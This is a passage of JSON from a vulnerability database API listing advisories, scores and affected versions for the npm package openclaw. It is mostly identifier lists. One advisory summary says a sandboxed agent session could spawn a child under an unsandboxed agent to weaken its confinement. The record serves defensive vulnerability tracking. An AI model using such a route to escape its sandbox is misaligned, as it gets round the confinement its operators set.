bility":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kk
b2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vu
he"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3
ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-32011","GHSA-x4vp-4235-65hg"],"risk_score":3.9,"exploitability":"0.5","weighted_severity":"7.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-
zwzb-t4a7-tff8"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50515?format=json","vulnerability_id":"VCID-25jw-duqj-5fcn","summary":"OpenClaw's sandboxed sessions_spawn now enforces sandbox inheritance for cross-agent spawns\nA sandboxed session could use cross-agent `sessions_spawn` to create a child under an agent configured with `sandbox.mode=\"off\"`, downgrading runtime confinement.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32048","reference_id":"","reference_type":"","scores":[{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06592","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06602","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32048"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-cross-agent-sessions-spawn","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-24T13:42:36Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escap
e-via-cross-agent-sessions-spawn"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32048","reference_id":"CVE-2026-32048","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32048"},{"reference_url":"https://github.com/advisories/GHSA-p7gr-f84w-hqg5","reference_id":"GHSA-p7gr-f84w-hqg5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p7gr-f84w-hqg5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p7gr-f84w-hqg5","reference_id":"GHSA-p7gr-f84w-hqg5","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-24T13:42:36Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p7gr-f84w-hqg5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"
},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"
},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"
},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"
},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"
},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"
},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"
